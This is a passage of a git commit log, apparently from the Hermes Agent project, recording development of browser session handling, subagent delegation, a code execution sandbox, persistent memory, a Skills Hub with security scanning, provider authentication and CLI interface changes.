- Updated the `run_agent.py` to reflect the new logging path, ensuring session logs are stored correctly alongside gateway sessions.
2026-02-21 01:20:18 -08:00
teknium1
a54a27595b fix: update browser command connection instructions to prevent session conflicts
- Clarified the usage of the --cdp flag when connecting to an existing Browserbase session.
- Emphasized the importance of not using --session with --cdp to avoid creating a local browser instance in agent-browser >=0.13.
- Updated comments to reflect changes in per-task isolation management with AGENT_BROWSER_SOCKET_DIR.
2026-02-21 00:54:01 -08:00
teknium1
7283b9f6cf feat: extend browser session management with improved thread safety and timeout configuration
- Increased the default session inactivity timeout from 2 to 5 minutes to accommodate LLM reasoning during multi-step tasks.
- Enhanced thread safety by implementing locks around session activity tracking and cleanup processes, allowing concurrent access by multiple subagents.
- Removed the stale daemon cleanup function, as it is no longer necessary with the updated session management approach.
- Updated logging and session cleanup logic to ensure proper handling of active sessions and associated resources.
2026-02-21 00:44:25 -08:00
teknium1
3dfc0a9679 feat: add PPTX editing and creation skills with comprehensive documentation
- Introduced new skills for editing and creating PPTX presentations, including a detailed guide on template-based workflows and script usage.
- Added scripts for slide management, cleaning, and packing PPTX files, enhancing the overall functionality for users.
- Included a LICENSE file to clarify usage rights and restrictions.
- Created a SKILL.md file to provide an overview and quick reference for PPTX-related tasks.
- Documented various formatting rules, common pitfalls, and design ideas to improve presentation quality.
2026-02-21 00:32:26 -08:00
teknium1
6903c4605c chore: update package-lock.json with new dependencies and version upgrades
- Upgraded the agent-browser dependency to version 0.13.0.
- Added multiple new dependencies including @appium/logger, @wdio/config, and others, along with their respective versions and licenses.
- Updated the integrity checks and resolved URLs for the new packages.
- Ensured compatibility with Node.js versions by specifying engine requirements for new dependencies.
2026-02-21 00:32:26 -08:00
teknium1
5b3f708fcb feat: enhance stale daemon cleanup and improve error logging in browser tool
- Updated the stale daemon cleanup function to support multiple patterns for identifying orphaned agent-browser processes, improving reliability across different versions.
- Added logging for stderr output during browser command execution to aid in diagnostics, particularly for capturing warnings from the agent-browser.
- Implemented a warning for empty snapshots returned from the agent-browser, indicating potential issues with stale daemons or CDP connections.
2026-02-21 00:27:35 -08:00
teknium1
b33ed9176f feat: update database schema and enhance message persistence
- Incremented schema version to 2 and added a new column `finish_reason` to the `messages` table.
- Implemented a method to flush un-logged messages to the session database, ensuring data integrity during conversation interruptions.
- Enhanced error handling to persist messages in various early-return scenarios, preventing data loss.
2026-02-21 00:05:39 -08:00
teknium1
c48817f69b chore: update agent-browser dependency and clean up stale daemon processes
- Upgraded the agent-browser dependency from version 0.7.6 to 0.13.0 in package.json.
- Added functionality to kill stale agent-browser daemon processes in browser_tool.py to prevent orphaned instances from previous runs.
2026-02-20 23:40:42 -08:00
teknium1
70dd3a16dc Cleanup time! 2026-02-20 23:23:32 -08:00
teknium1
9a19fe1f50 chore: remove deprecated session viewer and exported data files
- Deleted the session_viewer.html file, which was no longer in use.
- Removed the exprted.jsonl file, as it contained outdated exported data that is no longer relevant to the current project structure.
2026-02-20 23:02:02 -08:00
teknium1
3961f8e7a4 refactor: update README for improved clarity on provider setup and switching
- Revised the "Getting Started" section to clarify the installation process with `hermes setup`.
- Enhanced instructions for changing providers and models using the `hermes model` command.
- Streamlined the explanation of available provider options, including Nous Portal, OpenRouter, and custom endpoints.
2026-02-20 21:31:45 -08:00
teknium1
fc37b17b1f feat: simplify README instructions for connecting to LLM providers
- Streamlined the "Getting Started" section to focus on connecting to the Nous Portal.
- Removed detailed options for other providers, emphasizing the quickest setup method.
- Clarified the process for switching providers and models using the `hermes model` command.
2026-02-20 21:28:06 -08:00
teknium1
630bd3d789 feat: improve password prompt handling in terminal tool
- Replaced getpass with direct reading from /dev/tty to enhance password input handling without echoing.
- Updated threading logic for password input to ensure proper cleanup and error handling.
- Improved visual feedback during password prompt, including clearer separation and timeout messaging.
- Enhanced user experience by providing immediate feedback on password input status.
2026-02-20 21:26:31 -08:00
teknium1
5c4c0c0cba feat: update branding and visuals across the project
- Updated the README to include a new banner image and changed the title emoji from 🦋 to ⚕.
- Modified various CLI outputs and scripts to reflect the new branding, ensuring consistency in the use of the ⚕ emoji.
- Added a new banner image asset for enhanced visual appeal during installation and setup processes.
2026-02-20 21:25:04 -08:00
teknium1
24c241d29b add github project management skill 2026-02-20 21:15:17 -08:00
teknium1
a3d760ff12 feat: implement provider deactivation and enhance configuration updates
- Added a new function to deactivate the active provider without deleting credentials, facilitating smoother transitions between different provider types.
- Updated the model flow logic to ensure the active provider is correctly set in the configuration, including handling custom endpoints and OAuth providers.
- Improved error handling in the CLI to consistently format authentication error messages.
- Enhanced the model selection process to reflect the effective provider based on configuration and environment variables.
2026-02-20 18:17:55 -08:00
teknium1
77a3dda59d feat: enhance README and CLI with multi-provider model selection
- Added a comprehensive "Getting Started" section in the README to guide users through selecting inference providers.
- Implemented an interactive model selection feature in the CLI, allowing users to choose from available models or enter a custom model name.
- Improved user experience by displaying the current model and active provider during selection, with clear instructions for each provider type.
- Updated the model selection process to prioritize the currently active model, enhancing usability and clarity.
2026-02-20 17:52:46 -08:00
teknium1
f6daceb449 feat: add interactive model selection and saving functionality
- Implemented a new interactive model selection feature after user login, allowing users to choose from available models or enter a custom model name.
- Added functionality to save the selected model to the configuration file and environment variables, ensuring persistence across sessions.
- Enhanced user experience by providing both menu-based and fallback number-based selection methods for model choice.
2026-02-20 17:35:12 -08:00
teknium1
cfef34f7a6 feat: add multi-provider authentication and inference provider selection
- Implemented a multi-provider authentication system for the Hermes Agent, supporting OAuth for Nous Portal and traditional API key methods for OpenRouter and custom endpoints.
- Enhanced CLI with commands for logging in and out of providers, allowing users to authenticate and manage their credentials easily.
- Updated configuration options to select inference providers, with detailed documentation on usage and setup.
- Improved status reporting to include authentication status and provider details, enhancing user awareness of their current configuration.
- Added new files for authentication handling and updated existing components to integrate the new provider system.
2026-02-20 17:24:00 -08:00
teknium1
c007b9e5bd chore: update installer banner text for branding consistency
- Changed the banner message in both PowerShell and shell scripts to reflect the new branding of the Hermes Agent as an open source AI agent by Nous Research, enhancing clarity and consistency across installation scripts.
2026-02-20 11:20:59 -08:00
teknium1
b9f3518b33 refactor: streamline TODO.md for clarity and focus
- Removed outdated sections detailing existing tools and knowledge systems to enhance readability.
- Consolidated information on subagent architecture and interactive clarifying questions, emphasizing their current status and implementation details.
- Updated formatting and structure to improve navigation and understanding of the document's content.
2026-02-20 03:28:42 -08:00
teknium1
ba07d9d5e3 feat: enhance task delegation with spinner updates and progress display
- Added a spinner to visually indicate task delegation progress in quiet mode, improving user experience during batch processing.
- Implemented a method to update spinner text dynamically based on remaining tasks, providing real-time feedback.
- Enhanced the `delegate_task` function to include per-task completion messages, ensuring clarity on task status during execution.
- Updated the KawaiiSpinner class to allow message updates while running, facilitating better interaction during long-running tasks.
2026-02-20 03:23:23 -08:00
teknium1
90e5211128 feat: implement subagent delegation for task management
- Introduced the `delegate_task` tool, allowing the main agent to spawn child AIAgent instances with isolated context for complex tasks.
- Supported both single-task and batch processing (up to 3 concurrent tasks) to enhance task management capabilities.
- Updated configuration options for delegation, including maximum iterations and default toolsets for subagents.
- Enhanced documentation to provide clear guidance on using the delegation feature and its configuration.
- Added comprehensive tests to ensure the functionality and reliability of the delegation logic.
2026-02-20 03:15:53 -08:00
teknium1
c0d412a736 refactor: update search tool parameters and documentation for clarity
- Changed the target parameter from "content" and "files" to "grep" and "find" to better represent their functionality.
- Revised descriptions in the tool definitions and execution code schema to enhance understanding of search modes and output formats.
- Ensured consistency in the handling of search operations across the codebase.
2026-02-20 02:46:30 -08:00
teknium1
f9eb5edb96 refactor: rename search tool for clarity and consistency
- Updated the tool name from "search" to "search_files" across multiple files to better reflect its functionality.
- Adjusted related documentation and descriptions to ensure clarity in usage and expected behavior.
- Enhanced the toolset definitions and mappings to incorporate the new naming convention, improving overall consistency in the codebase.
2026-02-20 02:43:57 -08:00
teknium1
ba8b80a163 refactor: improve memory entry handling and file operations
- Replaced file locking with atomic file operations using temporary files to prevent race conditions during read/write.
- Added deduplication of memory and user entries to avoid exact duplicates in the memory store.
- Enhanced error handling for duplicate entries and improved logic for managing multiple matches in memory operations.
- Updated docstrings to clarify the behavior of file reading and writing methods, ensuring better understanding of the implementation.
2026-02-20 02:32:15 -08:00
teknium1
3b90fa5c9b fix: increase default timeout for code execution sandbox
- Updated the default timeout for sandbox script execution from 120 seconds to 300 seconds (5 minutes) to allow longer-running scripts.
- Enhanced comments in the code execution tool to clarify the timeout duration.
- Suppressed stdout and stderr output from internal tool handlers during execution to prevent clutter in the CLI interface.
2026-02-20 01:29:53 -08:00
teknium1
273b367f05 fix: update documentation and return types for web tools
- Revised docstrings for `web_search` and `web_extract` functions to clarify return types and structure.
- Updated the execution code schema documentation to reflect changes in the output format for both tools, ensuring consistency and improved understanding for users.
2026-02-19 23:30:01 -08:00
teknium1
783acd712d feat: implement code execution sandbox for programmatic tool calling
- Introduced a new `execute_code` tool that allows the agent to run Python scripts that call Hermes tools via RPC, reducing the number of round trips required for tool interactions.
- Added configuration options for timeout and maximum tool calls in the sandbox environment.
- Updated the toolset definitions to include the new code execution capabilities, ensuring integration across platforms.
- Implemented comprehensive tests for the code execution sandbox, covering various scenarios including tool call limits and error handling.
- Enhanced the CLI and documentation to reflect the new functionality, providing users with clear guidance on using the code execution tool.
2026-02-19 23:23:43 -08:00
teknium1
748f0b2b5f feat: enhance clarify tool with configurable timeout and countdown display
- Added a new configuration option for the clarify tool to set a custom timeout for user responses.
- Updated the clarify callback to implement a countdown display during user interaction, improving user experience.
- Refactored timeout handling to ensure the UI remains responsive and provides feedback on remaining time.
- Enhanced hint text to include countdown information when clarify questions are active.
2026-02-19 20:11:54 -08:00
teknium1
9350e26e68 feat: introduce clarifying questions tool for interactive user engagement
- Added a new `clarify_tool` to enable the agent to ask structured multiple-choice or open-ended questions to users.
- Implemented callback functionality for user interaction, allowing the platform to handle UI presentation.
- Updated the CLI and agent to support clarify questions, including timeout handling and response management.
- Enhanced toolset definitions and requirements to include the clarify tool, ensuring availability across platforms.
2026-02-19 20:06:14 -08:00
teknium1
997f793af1 feat: update TODO.md with enhancements to skills and memory systems
- Increased the tool count to 44+ and clarified the management of bundled and agent-managed skills.
- Introduced a persistent memory system with MEMORY.md and USER.md for agent notes and user profiles.
- Updated the storage evolution section to reflect the use of SQLite for sessions and clarified the organization of skills and memories.
- Added current status of memory types implemented, highlighting progress in agent intelligence capabilities.
2026-02-19 18:47:45 -08:00
teknium1
4d5f29c74c feat: introduce skill management tool for agent-created skills and skills migration to ~/.hermes
- Added a new `skill_manager_tool` to enable agents to create, update, and delete their own skills, enhancing procedural memory capabilities.
- Updated the skills directory structure to support user-created skills in `~/.hermes/skills/`, allowing for better organization and management.
- Enhanced the CLI and documentation to reflect the new skill management functionalities, including detailed instructions on creating and modifying skills.
- Implemented a manifest-based syncing mechanism for bundled skills to ensure user modifications are preserved during updates.
2026-02-19 18:25:53 -08:00
teknium1
d070b8698d fix: escape file glob patterns in ShellFileOperations
- Updated the file glob and include filters in the ShellFileOperations class to escape shell arguments, preventing unintended shell expansion.
- Added comments to clarify the necessity of quoting for file glob patterns.
2026-02-19 15:12:02 -08:00
teknium1
057d3e1810 feat: enhance search functionality in ShellFileOperations
- Updated the `_search_with_rg` and `_search_with_grep` methods to include filename in the output and improve result handling.
- Adjusted result fetching to account for context lines, ensuring accurate total counts and pagination.
- Enhanced parsing logic for matches and context lines, improving the accuracy of search results.
- Refactored result slicing to maintain consistency across output modes, ensuring users receive the correct number of results.
2026-02-19 15:10:17 -08:00
teknium1
d49af633f0 feat: enhance command execution with stdin support
- Modified the `_exec` method in `ShellFileOperations` to accept `stdin_data`, allowing large content to be piped directly to commands, bypassing ARG_MAX limitations.
- Updated the `execute` method in various environment classes (`_LocalEnvironment`, `_SingularityEnvironment`, `_SSHEnvironment`, `_DockerEnvironment`) to support `stdin_data`, improving command execution flexibility.
- Removed the unique marker generation for heredoc in favor of direct stdin piping, simplifying file writing operations and enhancing performance for large files.
2026-02-19 14:50:51 -08:00
teknium1
3191a9ba11 feat: add new conversation command and enhance command handling
- Introduced the `/new` command to start a new conversation, resetting the history.
- Updated command handling in the CLI and various platform adapters (Discord, Slack, Telegram) to support the new command.
- Added help command functionality to list available commands, improving user guidance.
- Enhanced command mapping for better integration across platforms, ensuring consistent command behavior.
2026-02-19 14:31:53 -08:00
teknium1
53e13fe1f1 feat: add Slack and WhatsApp setup prompts in setup wizard
- Implemented prompts for configuring Slack bot and WhatsApp bridge during the setup process.
- Added instructions for creating a Slack app and saving necessary tokens, enhancing user guidance.
- Included security recommendations for restricting bot access and a reminder to start the messaging gateway after setup.
2026-02-19 12:33:09 -08:00
teknium1
59cb0cecb2 feat: add messaging gateway startup functionality
- Introduced a new function to check for configured messaging platform tokens and prompt the user to start the gateway.
- Updated the installation scripts to automatically start the gateway if messaging tokens are detected, enhancing user experience.
- Expanded the README to include instructions for starting the gateway, ensuring users are informed about the necessary steps for message handling.
2026-02-19 09:43:46 -08:00
teknium1
1c6846c4c2 Merge branch 'main' of github.com:NousResearch/Hermes-Agent 2026-02-19 09:37:27 -08:00
teknium1
b88e441a07 feat: implement cross-channel messaging functionality
- Enhanced the `handle_send_message_function_call` to support sending messages to multiple platforms (Telegram, Discord, Slack, WhatsApp) using their respective APIs.
- Added error handling for missing parameters and platform configuration issues.
- Introduced asynchronous message sending with helper functions for each platform, improving responsiveness and reliability.
- Updated documentation within the function to clarify usage and requirements.
2026-02-19 09:37:25 -08:00
teknium1
4f57d7116d Improved stdout handling in the terminal tool to prevent deadlocks by implementing a background thread to continuously drain output, ensuring smooth command execution without blocking. 2026-02-19 09:26:31 -08:00
teknium1
422607df7c feat: expand README with update and messaging gateway instructions
- Added detailed sections for updating the Hermes agent, including quick and manual update methods.
- Introduced a messaging gateway section with setup instructions for Telegram, Discord, and Slack, along with commands for managing the gateway.
- Included security recommendations and context file usage to enhance user guidance.
2026-02-19 02:10:02 -08:00
teknium1
3f4b494c61 refactor: streamline thinking spinner behavior in AIAgent
- Updated the logic for stopping the thinking spinner to improve clarity in tool execution messages.
- Removed unnecessary checks for tool calls, simplifying the spinner's stop behavior while maintaining informative output for users.
2026-02-19 01:56:04 -08:00
teknium1
109dffb242 fix: refine dynamic height adjustment for input area in CLI
- Updated the input area height calculation to ensure it matches the exact line count of content, eliminating extra blank space.
- Adjusted the return values to improve the responsiveness of the input area, enhancing user experience when adding newlines.
2026-02-19 01:53:36 -08:00
teknium1
0e8ee051c6 feat: replace framed input with horizontal rules in CLI
- Updated the input area layout by replacing the styled border frame with horizontal rules above and below the input, enhancing visual clarity.
- Adjusted the layout to ensure the input area grows dynamically with content while maintaining a consistent appearance with inline completions.
- Modified style definitions to reflect the new horizontal rule design, improving the overall aesthetics of the CLI.
2026-02-19 01:51:54 -08:00
teknium1
5c545e67f3 feat: add styled border frame to input area in CLI
- Wrapped the input area in a styled border frame to enhance visual structure and user experience.
- Updated layout to accommodate the framed input, ensuring consistent appearance with inline completions below the input area.
- Introduced new style definitions for the input frame to improve overall aesthetics of the CLI.
2026-02-19 01:49:50 -08:00
teknium1
2daf5e4296 fix: improve CLI output rendering and response display
- Adjusted console width handling to ensure consistent output formatting.
- Introduced a short sleep after flushing stdout to allow for proper rendering of tool/status lines before displaying responses.
- Enhanced the response display by modifying the rendering logic to improve visual clarity and prevent interleaving of output.
2026-02-19 01:46:56 -08:00
teknium1
d0c8dd78c2 fix: ensure proper output rendering in CLI by flushing stdout
- Added a flush of the StdoutProxy buffer to ensure that tool/status lines render above the response box, preventing interleaving of output.
- Combined the rendering of the response and the surrounding box into a single _cprint call for improved visual consistency and clarity.
2026-02-19 01:43:15 -08:00
teknium1
21c3e9973a feat: enhance CLI output formatting with dynamic borders
- Added dynamic top and bottom borders to the response output in the HermesCLI, improving visual structure and readability.
- Implemented width adjustments for the borders based on console size, ensuring consistent appearance across different terminal environments.
- This change enhances the overall user experience by providing a clearer separation of messages in the CLI.
2026-02-19 01:39:01 -08:00
teknium1
8e4d013154 feat: improve ANSI text rendering in CLI
- Introduced a new function `_cprint` to handle ANSI-colored text rendering using prompt_toolkit's native capabilities, ensuring proper display of colors and formatting.
- Updated various print statements in the HermesCLI to utilize `_cprint`, enhancing the visual output of user messages and conversation indicators.
- This change improves the overall user experience by providing clearer and more visually appealing text in the CLI.
2026-02-19 01:34:14 -08:00
teknium1
37fb01b17d feat: enhance conversation display with ANSI escape codes
- Added ANSI escape codes for improved visual formatting in the CLI, including bold and colored text for user messages and conversation headers.
- Simplified the output structure by removing unnecessary visual separators and adapting the display to enhance readability and user experience.
2026-02-19 01:23:23 -08:00
teknium1
ac0a70b369 feat: enhance input area height adjustment in CLI
- Implemented dynamic height adjustment for the input area in HermesCLI to accommodate varying content lines, ensuring that newlines (Alt+Enter) remain visible.
- This change improves usability by preventing internal scrolling of the input area when displaying output from the agent.
2026-02-19 01:14:53 -08:00
teknium1
a4bc6f73d7 refactor: simplify CLI layout by integrating inline completions
- Updated the HermesCLI layout to replace the floating completion menu with an inline CompletionsMenu, ensuring it appears consistently below the input area.
- This change enhances user experience by maintaining visibility of completions even after agent output fills the terminal, improving usability in non-full-screen modes.
2026-02-19 01:11:02 -08:00
teknium1
56ee8a5cc6 refactor: remove 'read' action from memory tool and agent logging
- Eliminated the 'read' action from the memory tool and related logging in the agent, streamlining the available actions to 'add', 'replace', and 'remove'.
- Updated error messages and documentation to reflect the removal of the 'read' action, ensuring clarity in the API's usage.
2026-02-19 01:03:08 -08:00
teknium1
440c244cac feat: add persistent memory system + SQLite session store
Two-part implementation:

Part A - Curated Bounded Memory:
- New memory tool (tools/memory_tool.py) with MEMORY.md + USER.md stores
- Character-limited (2200/1375 chars), § delimited entries
- Frozen snapshot injected into system prompt at session start
- Model manages pruning via replace/remove with substring matching
- Usage indicator shown in system prompt header

Part B - SQLite Session Store:
- New hermes_state.py with SessionDB class, FTS5 full-text search
- Gateway session.py rewritten to dual-write SQLite + legacy JSONL
- Compression-triggered session splitting with parent_session_id chains
- New session_search tool with Gemini Flash summarization of matched sessions
- CLI session lifecycle (create on launch, close on exit)

Also:
- System prompt now cached per session, only rebuilt on compression
  (fixes prefix cache invalidation from date/time changes every turn)
- Config version bumped to 3, hermes doctor checks for new artifacts
- Disabled in batch_runner and RL environments
2026-02-19 00:57:31 -08:00
teknium1
655303f2f1 Add skill name resolution and enhanced install confirmation in Skills Hub
- Introduced a new function `_resolve_short_name` to convert short skill names to full identifiers, improving user experience during skill installation.
- Updated the `do_install` function to utilize the new resolution method for identifiers without slashes, ensuring accurate skill fetching.
- Enhanced the install confirmation process to include a disclaimer about third-party skills, emphasizing user responsibility and security awareness.
2026-02-18 16:20:35 -08:00
teknium1
14e59706b7 Add Skills Hub — universal skill search, install, and management from online registries
Implements the Hermes Skills Hub with agentskills.io spec compliance,
multi-registry skill discovery, security scanning, and user-driven
management via CLI and /skills slash command.

Core features:
- Security scanner (tools/skills_guard.py): 120 threat patterns across
  12 categories, trust-aware install policy (builtin/trusted/community),
  structural checks, unicode injection detection, LLM audit pass
- Hub client (tools/skills_hub.py): GitHub, ClawHub, Claude Code
  marketplace, and LobeHub source adapters with shared GitHubAuth
  (PAT + gh CLI + GitHub App), lock file provenance tracking, quarantine
  flow, and unified search across all sources
- CLI interface (hermes_cli/skills_hub.py): search, install, inspect,
  list, audit, uninstall, publish (GitHub PR), snapshot export/import,
  and tap management — powers both `hermes skills` and `/skills`

Spec conformance (Phase 0):
- Upgraded frontmatter parser to yaml.safe_load with fallback
- Migrated 39 SKILL.md files: tags/related_skills to metadata.hermes.*
- Added assets/ directory support and compatibility/metadata fields
- Excluded .hub/ from skill discovery in skills_tool.py

Updated 13 config/doc files including README, AGENTS.md, .env.example,
setup wizard, doctor, status, pyproject.toml, and docs.
2026-02-18 16:09:05 -08:00
teknium1
d59e93d5e9 Enhance platform toolset configuration and CLI toolset handling
- Introduced a new configuration section in `cli-config.yaml.example` for defining platform-specific toolsets, allowing for greater customization of available tools per platform.
- Updated the CLI to check for user-defined toolsets in the configuration, falling back to the default `hermes-cli` toolset if none are specified.
- Enhanced the `GatewayRunner` class to load platform-specific toolsets from the configuration, ensuring that the correct tools are enabled based on the platform being used.
2026-02-17 23:39:24 -08:00
teknium1
9e85408c7b Add todo tool for task management and enhance CLI features
- Introduced a new `todo_tool.py` for planning and tracking multi-step tasks, enhancing the agent's capabilities.
- Updated CLI to include a floating autocomplete dropdown for commands and improved user instructions for better navigation.
- Revised toolsets to incorporate the new `todo` tool and updated documentation to reflect changes in available tools and commands.
- Enhanced user experience with new keybindings and clearer command descriptions in the CLI.
2026-02-17 23:30:31 -08:00
teknium1
225ae32e7a Enhance CLI layout with floating completion menu
- Updated the layout in HermesCLI to include a floating completion menu, improving user experience by providing real-time suggestions as users type.
- Refactored the layout structure to utilize FloatContainer, ensuring the input area remains accessible while displaying the completion menu dynamically.
2026-02-17 23:04:48 -08:00
teknium1
50ef18644b Update multiline input instructions in HermesCLI
- Revised user instructions to reflect the removal of the Ctrl+Enter key binding for new lines, simplifying the input method.
- Clarified that Alt+Enter is now the sole key for multi-line input, enhancing user experience.
2026-02-17 22:53:48 -08:00
teknium1
41608beb35 Update multiline input handling in HermesCLI
- Removed the Shift+Enter key binding for inserting new lines, simplifying the input method.
- Introduced Ctrl+Enter as the primary key for multi-line input, ensuring better compatibility across terminals.
- Updated user instructions to reflect the new key bindings for a clearer user experience.
2026-02-17 22:51:25 -08:00
teknium1
d9a8e421a4 Enhance multiline input handling in HermesCLI
- Patched prompt_toolkit to recognize Shift+Enter as a distinct key for inserting new lines, improving the multiline input experience.
- Added Alt+Enter as a fallback for terminals that do not support Shift+Enter, ensuring consistent functionality across different environments.
- Updated user instructions to reflect the new key bindings for multiline input.
2026-02-17 21:53:19 -08:00
teknium1
d7cef744ec Add autocomplete and multiline support in HermesCLI input
- Introduced SlashCommandCompleter for command autocompletion, enhancing user experience by suggesting commands as users type.
- Enabled multiline input with Shift+Enter, allowing users to enter longer messages more conveniently.
- Implemented paste detection to handle large text inputs, saving them to temporary files and replacing them with compact references in the input area.
- Updated input area styling and hint display to improve usability and feedback during agent operation.
2026-02-17 21:47:54 -08:00
teknium1
54cbf30c14 Refactor dynamic prompt and layout in HermesCLI
- Updated the dynamic prompt to display the Hermes symbol when the agent is active, enhancing user feedback.
- Introduced a spacer line in the layout to prevent spinner output from overlapping the input cursor, improving usability.
- Adjusted the overall layout to maintain a clean interface while accommodating dynamic elements.
2026-02-17 21:34:49 -08:00
teknium1
dfa3c6265c Refactor CLI input prompt and layout in HermesCLI
- Updated the input area prompt to dynamically reflect agent status, enhancing user feedback during operation.
- Removed the status line from the layout to streamline the interface, focusing solely on the input area.
- Adjusted styling for prompt states to improve visual clarity and user experience.
2026-02-17 21:33:00 -08:00
teknium1
a7f52911e1 Refactor CLI output formatting in AIAgent
- Removed ANSI escape codes for color in tool activity messages to simplify output.
- Updated the _get_cute_tool_message method to provide a cleaner, more consistent format for various tool activities.
- Enhanced readability by aligning messages and removing unnecessary complexity, ensuring a more straightforward user experience.
2026-02-17 21:29:23 -08:00
teknium1
1e31614572 Refactor tool activity messages in AIAgent for improved CLI output
- Introduced ANSI escape codes for color-coded CLI messages to enhance readability.
- Updated the _get_cute_tool_message method to generate clean, aligned activity lines for various tools, replacing kawaii ASCII art with a more structured format.
- Simplified message construction for web tools, terminal commands, and process management, ensuring consistent and scannable output.
2026-02-17 21:26:41 -08:00
teknium1
3b615b0f7a Enhance tool previews in AIAgent and GatewayRunner
- Updated the _build_tool_preview function to include detailed previews for new tools: 'todo', 'send_message', and various 'rl_' tools, improving user feedback during task execution.
- Added emoji representations for tools in GatewayRunner, including 'process', 'todo', and 'send_message', to enhance visual clarity in progress messages.
- Improved handling of task management and messaging outputs, ensuring more informative and user-friendly interactions.
2026-02-17 17:11:31 -08:00
teknium1
e184f5ab3a Add todo tool for agent task planning and management
Single `todo` tool that reads (no params) or writes (provide todos array
with merge flag). In-memory TodoStore on AIAgent, no system prompt
mutation, behavioral guidance in tool description only. State re-injected
after context compression events. Gateway sessions hydrate from
conversation history. Added to all platform toolsets.

Also wired into RL agent_loop.py with per-run TodoStore and fixed
browser_snapshot user_task passthrough from first user message.
2026-02-17 17:02:33 -08:00
Sam Herring
d0f82e6dcc Removing random project notes doc 2026-02-17 08:02:29 -08:00
teknium1
49e1f9ea89 Refactor TODO.md to summarize future improvements for the Hermes Agent, focusing on subagent architecture, task management, dynamic skills expansion, and interactive clarifying questions. Key ideas include context isolation for subagents, task decomposition, progress tracking, and skill acquisition from successful tasks. 2026-02-17 03:24:38 -08:00
teknium1
6731230d73 Add special handling for 'process' tool in _build_tool_preview function
- Enhanced the _build_tool_preview function to include specific formatting for the 'process' tool, displaying action, session_id, data, and timeout when applicable.
- This update improves the clarity of tool previews, particularly for actions that require session tracking and timeout management.
2026-02-17 03:18:27 -08:00
teknium1
ec59d71e60 Update PTY write handling in ProcessRegistry to ensure data is encoded as bytes before writing. This change improves compatibility with string inputs and clarifies the expected data type in comments. 2026-02-17 03:14:47 -08:00
teknium1
bdac541d1e Rename OPENAI_API_KEY to HERMES_OPENAI_API_KEY in configuration and codebase for clarity and to avoid conflicts. Update related documentation and error messages to reflect the new key name, ensuring backward compatibility with existing setups. 2026-02-17 03:11:17 -08:00
teknium1
061fa70907 Add background process management with process tool, wait, PTY, and stdin support
New process registry and tool for managing long-running background processes
across all terminal backends (local, Docker, Singularity, Modal, SSH).

Process Registry (tools/process_registry.py):
- ProcessSession tracking with rolling 200KB output buffer
- spawn_local() with optional PTY via ptyprocess for interactive CLIs
- spawn_via_env() for non-local backends (runs inside sandbox, never on host)
- Background reader threads per process (Popen stdout or PTY)
- wait() with timeout clamping, interrupt support, and transparent limit reporting
- JSON checkpoint to ~/.hermes/processes.json for gateway crash recovery
- Module-level singleton shared across agent loop, gateway, and RL

Process Tool (model_tools.py):
- 7 actions: list, poll, log, wait, kill, write, submit
- Paired with terminal in all toolsets (CLI, messaging, RL)
- Timeout clamping with transparent notes in response

Terminal Tool Updates (tools/terminal_tool.py):
- Replaced nohup background mode with registry spawn (returns session_id)
- Added workdir parameter for per-command working directory
- Added check_interval parameter for gateway auto-check watchers
- Added pty parameter for interactive CLI tools (Codex, Claude Code)
- Updated TERMINAL_TOOL_DESCRIPTION with full background workflow docs
- Cleanup thread now respects active background processes (won't reap sandbox)

Gateway Integration (gateway/run.py, session.py, config.py):
- Session reset protection: sessions with active processes exempt from reset
- Default idle timeout increased from 2 hours to 24 hours
- from_dict fallback aligned to match (was 120, now 1440)
- session_key env var propagated to process registry for session mapping
- Crash recovery on gateway startup via checkpoint probe
- check_interval watcher: asyncio task polls process, delivers updates to platform

RL Safety (environments/):
- tool_context.py cleanup() kills background processes on episode end
- hermes_base_env.py warns when enabled_toolsets is None (loads all tools)
- Process tool safe in RL via wait() blocking the agent loop

Also:
- Added ptyprocess as optional dependency (in pyproject.toml [pty] extra + [all])
- Fixed pre-existing bug: rl_test_inference missing from TOOL_TO_TOOLSET_MAP
- Updated AGENTS.md with process management docs and project structure
- Updated README.md terminal section with process management overview
2026-02-17 02:51:31 -08:00
teknium1
48b5cfd085 Add skip_context_files option to AIAgent for batch processing
- Introduced a new parameter `skip_context_files` in the AIAgent class to control the inclusion of context files (SOUL.md, AGENTS.md, .cursorrules) in the system prompt.
- Updated the _process_single_prompt function to set `skip_context_files` to True, preventing pollution of trajectories during batch processing and data generation.
2026-02-16 22:40:31 -08:00
teknium1
a7609c97be Update docs to match backend key rename and CWD behavior
- cli-config.yaml.example: env_type → backend everywhere, matching the
  documented config key that hermes_cli/config.py and README already use
- cli-config.yaml.example: added comments clarifying cwd is a path
  INSIDE the target environment for non-local backends
- AGENTS.md: updated terminal.cwd description to explain "." only
  resolves to host CWD for the local backend
- .env.example: updated TERMINAL_CWD comment to warn against using
  host-local paths with remote backends, lists per-backend defaults
2026-02-16 22:31:41 -08:00
teknium1
c33feb6dc9 Fix host CWD leaking into non-local terminal backends
When using Modal, Docker, SSH, or Singularity as the terminal backend
from the CLI, the agent resolved cwd: "." to the host machine's local
path (e.g. /Users/rewbs/code/hermes-agent) and passed it to the remote
sandbox, where it doesn't exist. All commands failed with "No such file
or directory".

Root cause: cli.py unconditionally resolved "." to os.getcwd() and wrote
it to TERMINAL_CWD regardless of backend type. Every tool then used that
host-local path as the working directory inside the remote environment.

Fixes:
- cli.py: only resolve "." to os.getcwd() for the local backend. For all
  remote backends (ssh, docker, modal, singularity), leave TERMINAL_CWD
  unset so the tool layer uses per-backend defaults (/root, /, ~, etc.)
- terminal_tool.py: added sanity check -- if TERMINAL_CWD contains a
  host-local prefix (/Users/, /home/, C:\) for a non-local backend, log
  a warning and fall back to the backend's default
- terminal_tool.py: SSH default CWD is now ~ instead of os.getcwd()
- file_operations.py: last-resort CWD fallback changed from os.getcwd()
  to "/" so host paths never leak into remote file operations
2026-02-16 22:30:04 -08:00
teknium1
2c7deb41f6 Fix Modal backend not working from CLI
Two config systems used different key names for the terminal backend:
- hermes_cli/config.py, README, and all docs use "terminal.backend"
- cli.py's env var mapping only recognized "terminal.env_type"

Users following the docs who set `backend: modal` in ~/.hermes/config.yaml
had it silently ignored -- TERMINAL_ENV always defaulted to "local".

Additionally, when no config file existed, cli.py's hardcoded defaults
overwrote any TERMINAL_ENV=modal set in .env, despite the comment saying
"env vars take precedence."

Fixes:
- cli.py now normalizes "backend" -> "env_type" (backend takes precedence)
- Defaults no longer overwrite .env when no config file terminal section exists
- hermes status reads from config as fallback when env var isn't set

Also fixes four related bugs found in the Modal/sandbox lifecycle:
- file_tools cache not cleared on sandbox cleanup (stale ops on dead sandbox)
- Global lock held during slow Modal teardown (blocked all tool calls 10-15s)
